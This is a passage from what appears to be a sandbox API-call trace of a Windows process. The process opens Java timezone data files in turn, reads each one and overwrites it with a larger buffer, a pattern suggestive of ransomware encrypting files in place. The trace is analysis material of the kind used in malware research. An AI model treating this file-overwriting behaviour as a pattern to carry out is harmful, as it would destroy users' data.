dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f300*=0) returned 0x0 [0131.976] WriteFile (in: hFile=0x20c, lpBuffer=0x26cf048*, nNumberOfBytesToWrite=0x5e9, lpNumberOfBytesWritten=0x2b1f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf048*, lpNumberOfBytesWritten=0x2b1f2d0*=0x5e9, lpOverlapped=0x0) returned 1 [0131.977] CloseHandle (hObject=0x20c) returned 1 [0131.977] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Australia\\Brisbane" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\australia\\brisbane"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x20c [0131.983] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0131.983] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0xbd [0131.983] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0131.983] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0131.983] ReleaseMutex (hMutex=0x168) returned 1 [0131.983] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Brisbane", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0131.983] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Brisbane", cchWideChar=8, lpMultiByteStr=0x1f7358c, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Brisbane", lpUsedDefaultChar=0x0) returned 8 [0131.983] ReadFile (in: hFile=0x20c, lpBuffer=0x1ee0918, nNumberOfBytesToRead=0xbd, lpNumberOfBytesRead=0x2b1f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1ee0918*, lpNumberOfBytesRead=0x2b1f2bc*=0xbd, lpOverlapped=0x0) returned 1 [0131.985] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f300*=0) returned 0x0 [0131.985] WriteFile (in: hFile=0x20c, lpBuffer=0x26cf048*, nNumberOfBytesToWrite=0x645, lpNumberOfBytesWritten=0x2b1f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf048*, lpNumberOfBytesWritten=0x2b1f2d0*=0x645, lpOverlapped=0x0) returned 1 [0131.985] CloseHandle (hObject=0x20c) returned 1 [0131.985] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Australia\\Melbourne" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\australia\\melbourne"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x20c [0131.992] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0131.992] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x4c8 [0131.992] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0131.992] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0131.992] ReleaseMutex (hMutex=0x168) returned 1 [0131.992] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Melbourne", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0131.992] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Melbourne", cchWideChar=9, lpMultiByteStr=0x1f7340c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Melbourne", lpUsedDefaultChar=0x0) returned 9 [0131.992] ReadFile (in: hFile=0x20c, lpBuffer=0x1ea3978, nNumberOfBytesToRead=0x4c8, lpNumberOfBytesRead=0x2b1f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1ea3978*, lpNumberOfBytesRead=0x2b1f2bc*=0x4c8, lpOverlapped=0x0) returned 1 [0132.334] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f300*=0) returned 0x0 [0132.334] WriteFile (in: hFile=0x20c, lpBuffer=0x1ea9ab8*, nNumberOfBytesToWrite=0xa50, lpNumberOfBytesWritten=0x2b1f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1ea9ab8*, lpNumberOfBytesWritten=0x2b1f2d0*=0xa50, lpOverlapped=0x0) returned 1 [0132.335] CloseHandle (hObject=0x20c) returned 1 [0132.335] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\gmt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0132.342] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0132.342] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x1b [0132.343] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0132.343] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0132.343] ReleaseMutex (hMutex=0x168) returned 1 [0132.343] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GMT", cchWideChar=3, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 3 [0132.343] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GMT", cchWideChar=3, lpMultiByteStr=0x1f7ace4, cbMultiByte=3, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GMT", lpUsedDefaultChar=0x0) returned 3 [0132.343] ReadFile (in: hFile=0x1cc, lpBuffer=0x1f88b28, nNumberOfBytesToRead=0x1b, lpNumberOfBytesRead=0x2b1f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f88b28*, lpNumberOfBytesRead=0x2b1f2bc*=0x1b, lpOverlapped=0x0) returned 1 [0132.344] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f300*=0) returned 0x0 [0132.344] WriteFile (in: hFile=0x1cc, lpBuffer=0x1eff4b8*, nNumberOfBytesToWrite=0x5a3, lpNumberOfBytesWritten=0x2b1f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eff4b8*, lpNumberOfBytesWritten=0x2b1f2d0*=0x5a3, lpOverlapped=0x0) returned 1 [0132.345] CloseHandle (hObject=0x1cc) returned 1 [0132.345] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT+5" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\gmt+5"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0132.346] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0132.346] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x1b [0132.346] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0132.346] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0132.346] ReleaseMutex (hMutex=0x168) returned 1 [0132.346] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GMT+5", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0132.347] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GMT+5", cchWideChar=5, lpMultiByteStr=0x1f7accc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GMT+5", lpUsedDefaultChar=0x0) returned 5 [0132.347] ReadFile (in: hFile=0x1cc, lpBuffer=0x1f88b28, nNumberOfBytesToRead=0x1b, lpNumberOfBytesRead=0x2b1f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f88b28*, lpNumberOfBytesRead=0x2b1f2bc*=0x1b, lpOverlapped=0x0) returned 1 [0132.348] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f300*=0) returned 0x0 [0132.348] WriteFile (in: hFile=0x1cc, lpBuffer=0x1eff4b8*, nNumberOfBytesToWrite=0x5a3, lpNumberOfBytesWritten=0x2b1f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eff4b8*, lpNumberOfBytesWritten=0x2b1f2d0*=0x5a3, lpOverlapped=0x0) returned 1 [0132.349] CloseHandle (hObject=0x1cc) returned 1 [0132.349] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT-12" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\gmt-12"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0132.350] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0132.350] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x1b [0132.350] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0132.350] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0132.350] ReleaseMutex (hMutex=0x168) returned 1 [0132.350] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GMT-12", cchWideChar=6, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0132.350] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GMT-12", cchWideChar=6, lpMultiByteStr=0x1f7accc, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GMT-12", lpUsedDefaultChar=0x0) returned 6 [0132.350] ReadFile (in: hFile=0x1cc, lpBuffer=0x1f88b28, nNumberOfBytesToRead=0x1b, lpNumberOfBytesRead=0x2b1f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f88b28*, lpNumberOfBytesRead=0x2b1f2bc*=0x1b, lpOverlapped=0x0) returned 1 [0132.352] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f300*=0) returned 0x0 [0132.352] WriteFile (in: hFile=0x1cc, lpBuffer=0x1eff4b8*, nNumberOfBytesToWrite=0x5a3, lpNumberOfBytesWritten=0x2b1f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eff4b8*, lpNumberOfBytesWritten=0x2b1f2d0*=0x5a3, lpOverlapped=0x0) returned 1 [0132.352] CloseHandle (hObject=0x1cc) returned 1 [0132.353] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT-7" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\gmt-7"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0132.382] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0132.382] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x1b [0132.382] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0132.382] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0132.383] ReleaseMutex (hMutex=0x168) returned 1 [0132.383] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GMT-7", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0132.383] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GMT-7", cchWideChar=5, lpMultiByteStr=0x1f7accc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GMT-7", lpUsedDefaultChar=0x0) returned 5 [0132.383] ReadFile (in: hFile=0x1cc, lpBuffer=0x1f88bc8, nNumberOfBytesToRead=0x1b, lpNumberOfBytesRead=0x2b1f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f88bc8*, lpNumberOfBytesRead=0x2b1f2bc*=0x1b, lpOverlapped=0x0) returned 1 [0132.384] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f300*=0) returned 0x0 [0132.384] WriteFile (in: hFile=0x1cc, lpBuffer=0x1eff4b8*, nNumberOfBytesToWrite=0x5a3, lpNumberOfBytesWritten=0x2b1f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eff4b8*, lpNumberOfBytesWritten=0x2b1f2d0*=0x5a3, lpOverlapped=0x0) returned 1 [0132.385] CloseHandle (hObject=0x1cc) returned 1 [0132.385] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Belgrade" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\belgrade"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0132.399] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0132.399] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x410 [0132.399] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0132.399] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0132.399] ReleaseMutex (hMutex=0x168) returned 1 [0132.399] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Belgrade", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0132.399] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Belgrade", cchWideChar=8, lpMultiByteStr=0x1f7344c, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Belgrade", lpUsedDefaultChar=0x0) returned 8 [0132.400] ReadFile (in: hFile=0x204, lpBuffer=0x1e99938, nNumberOfBytesToRead=0x410, lpNumberOfBytesRead=0x2b1f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1e99938*, lpNumberOfBytesRead=0x2b1f2bc*=0x410, lpOverlapped=0x0) returned 1 [0132.485] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f300*=0) returned 0x0 [0132.486] WriteFile (in: hFile=0x204, lpBuffer=0x1eac3d8*, nNumberOfBytesToWrite=0x998, lpNumberOfBytesWritten=0x2b1f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eac3d8*, lpNumberOfBytesWritten=0x2b1f2d0*=0x998, lpOverlapped=0x0) returned 1 [0132.486] CloseHandle (hObject=0x204) returned 1 [0132.486] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Gibraltar" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\gibraltar"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0132.498] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0132.498] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x68c [0132.498] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0132.498] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0132.499] ReleaseMutex (hMutex=0x168) returned 1 [0132.499] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Gibraltar", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0132.499] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Gibraltar", cchWideChar=9, lpMultiByteStr=0x1f7358c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Gibraltar", lpUsedDefaultChar=0x0) returned 9 [0132.499] ReadFile (in: hFile=0x1cc, lpBuffer=0x286cf78, nNumberOfBytesToRead=0x68c, lpNumberOfBytesRead=0x2b1f2bc, lpOverlapped=0x0 | out: lpBuffer=0x286cf78*, lpNumberOfBytesRead=0x2b1f2bc*=0x68c, lpOverlapped=0x0) returned 1 [0132.503] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f300*=0) returned 0x0 [0132.503] WriteFile (in: hFile=0x1cc, lpBuffer=0x1e983d8*, nNumberOfBytesToWrite=0xc14, lpNumberOfBytesWritten=0x2b1f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1e983d8*, lpNumberOfBytesWritten=0x2b1f2d0*=0xc14, lpOverlapped=0x0) returned 1 [0132.503] CloseHandle (hObject=0x1cc) returned 1 [0132.504] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Madrid" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\madrid"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0132.505] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0132.505] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x588 [0132.505] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0132.506] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0132.506] ReleaseMutex (hMutex=0x168) returned 1 [0132.506] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Madrid", cchWideChar=6, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0132.506] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Madrid", cchWideChar=6, lpMultiByteStr=0x1f7accc, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Madrid", lpUsedDefaultChar=0x0) returned 6 [0132.506] ReadFile (in: hFile=0x1cc, lpBuffer=0x1eff4b8, nNumberOfBytesToRead=0x588, lpNumberOfBytesRead=0x2b1f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1eff4b8*, lpNumberOfBytesRead=0x2b1f2bc*=0x588, lpOverlapped=0x0) returned 1 [0132.511] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f300*=0) returned 0x0 [0132.511] WriteFile (in: hFile=0x1cc, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0xb10, lpNumberOfBytesWritten=0x2b1f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x2b1f2d0*=0xb10, lpOverlapped=0x0) returned 1 [0132.512] CloseHandle (hObject=0x1cc) returned 1 [0132.512] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Riga" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\riga"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0132.513] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0132.513] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x454 [0132.513] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0132.513] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0132.513] ReleaseMutex (hMutex=0x168) returned 1 [0132.513] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Riga", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0132.513] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Riga", cchWideChar=4, lpMultiByteStr=0x1f7accc, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Riga", lpUsedDefaultChar=0x0) returned 4 [0132.513] ReadFile (in: hFile=0x1cc, lpBuffer=0x269c668, nNumberOfBytesToRead=0x454, lpNumberOfBytesRead=0x2b1f2bc, lpOverlapped=0x0 | out: lpBuffer=0x269c668*, lpNumberOfBytesRead=0x2b1f2bc*=0x454, lpOverlapped=0x0) returned 1 [0132.517] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f300*=0) returned 0x0 [0132.517] WriteFile (in: hFile=0x1cc, lpBuffer=0x1eac3d8*, nNumberOfBytesToWrite=0x9dc, lpNumberOfBytesWritten=0x2b1f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eac3d8*, lpNumberOfBytesWritten=0x2b1f2d0*=0x9dc, lpOverlapped=0x0) returned 1 [0132.517] CloseHandle (hObject=0x1cc) returned 1 [0132.517] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Uzhgorod" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\uzhgorod"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0132.522] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0132.522] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x41c [0132.522] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0132.522] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0132.522] ReleaseMutex (hMutex=0x168) returned 1 [0132.522] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Uzhgorod", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0132.522] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Uzhgorod", cchWideChar=8, lpMultiByteStr=0x1f7352c, cbMultiByte=8, lpDefaultChar=0x0, 